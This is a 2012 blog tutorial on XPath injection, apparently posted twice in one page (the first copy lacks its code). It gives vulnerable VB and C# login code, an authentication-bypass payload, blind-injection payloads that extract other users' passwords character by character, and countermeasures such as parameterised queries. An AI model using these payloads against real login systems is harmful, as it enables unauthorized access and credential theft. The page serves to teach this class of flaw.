Before we begin, I want to say that I'll make this presentation without, i'll spare you the theory xD
Summary :
What is XPath ?
XPath is a language solely used for selecting nodes from an XML document. XPath formats XML data as tree-structured values.
There are some similarities between SQL and XPath. XPath v.1.0 is a W3C standard and it is still the most used - XPath v.2.0 recently released. Many languages support XPath such as Java, JavaScript, .NET framework, PHP, Python, Perl ans Ruby.
XPath Injection :
Scenario: Anthentication system which performs XPath query
VB:
C#:
Username = user
Password = password
XPath query becomes: //users/user[username/text()='user' and password/text()='password'
In this case, injection is possible in the Username variable. The same attack logic of SQL injection can be applied for XPath
In this case, only the first part of the XPath needs to be true. The password part becomes irrelevant, and the UserName part will match ALL users because of the "1=1" condition. This injection will allow the attacker to bypass the authentication system. Note thath the big difference between XML files and SQL database is the lack of access control. XPath does not have any restrictions when querying the XML file. Therefore it's possible to retrieve data from the entire document.
Blind XPath Injection
XPath disallows commenting out the rest of expression. The attacker needs to use 'OR' to void all expressions.
Original XPath Request:
1) Extracting XML file structure: (confirming if "username" node exists)
2) Considering we have valid credentials for one user, we can then use these TRUE conditions to get other user credentials in the database. In this scenario, this query will return TRUE if also the first character of the second user password element is "a".
This blind XPath injection can also make use of the functions "contains" and "string-length" and all relative functions. In this case, AND must be used so that all condition must be true.
Other XML crawling techniques that can be used :
Return number of nodes in the XML file
Return True if the lenght of the first username element is equal to 4 digits
Return True if the first username element contains the string "r"
XPath Injection Countermeasures
Input version : Always filter input and escape output
Parameterisation : It is possible to parametrisie expressions that are passed to the XPath parser for dynamic execution at run time.
The query can be parameterised by creating an external file and using XQuery to query the file.
Precompiled XPath : Use precompiled XPath. If you are using .NET, consider Dynamic Context of Daniel Cazzulino :
©2012, copyright BLACK BURN
Summary :
- What is XPath ?
- XPath Injection
- XPath Injection
- Blind XPath Injection
- XPath Injection CounterMeasures
What is XPath ?
XPath is a language solely used for selecting nodes from an XML document. XPath formats XML data as tree-structured values.
There are some similarities between SQL and XPath. XPath v.1.0 is a W3C standard and it is still the most used - XPath v.2.0 recently released. Many languages support XPath such as Java, JavaScript, .NET framework, PHP, Python, Perl ans Ruby.
XPath Injection :
Scenario: Anthentication system which performs XPath query
VB:
Code:
Dim FindUserXPath as String FundUserXPath =
"//Users/user[username/text()='" & Request("Username")
& "' And password/text()='" & Resquest("Password") & "']"
Code:
String FundUserXPath; FindUserXPath =
"//Users/user[username/text()='" + Request("Username")
+ "' And password/text()='" + Request("Password") +
"']";
Password = password
XPath query becomes: //users/user[username/text()='user' and password/text()='password'
Code:
Username = user' or '1' = '1' Password = password XPath query becomes: //users/user[username/text()='user' or '1' = '1' and password/text()='password']
Blind XPath Injection
XPath disallows commenting out the rest of expression. The attacker needs to use 'OR' to void all expressions.
Original XPath Request:
Code:
Username = user Password = password XPath query becomes: //users/user[username/text()='user' and password/text()='password']
Code:
Username = jjj' or name(//users/user/username[1]) = 'username' or 'a'='b Password = password XPath query becomes: //users/user[username/text()='jjj' or name(//users/user/username[1]) = 'username' or 'a'='b' and password/text()='password']
Code:
Username = root' and substring((//user[position()=2]/child::node() [position()=1]),1,1)="a" and '1' = '1 Password = OAhhgg XPath query becomes: //users/user[username/text()='root' and substring((//user[position()=2]/child::node() [position()=1]),1,1)="a" and '1' = '1' and password/text()='OAhhgg']
Other XML crawling techniques that can be used :
Return number of nodes in the XML file
Code:
count(//user/child::node())
Code:
string-length(//username[position()=1]/child::node()[position()=1])=4
Code:
contains(//username[position()=1]/child::node()[position()=1],"r")
Input version : Always filter input and escape output
Parameterisation : It is possible to parametrisie expressions that are passed to the XPath parser for dynamic execution at run time.
The query can be parameterised by creating an external file and using XQuery to query the file.
Precompiled XPath : Use precompiled XPath. If you are using .NET, consider Dynamic Context of Daniel Cazzulino :
Code:
XPathNodeIterator custData = XPathCache.Select("//customer[@name=$name and @password=$password]", customersDocument, new XPathVariable("name", txtName.Text), new XPathVariable("password", txtpassword.Text));
©2012, copyright BLACK BURN
0 comments:
Post a Comment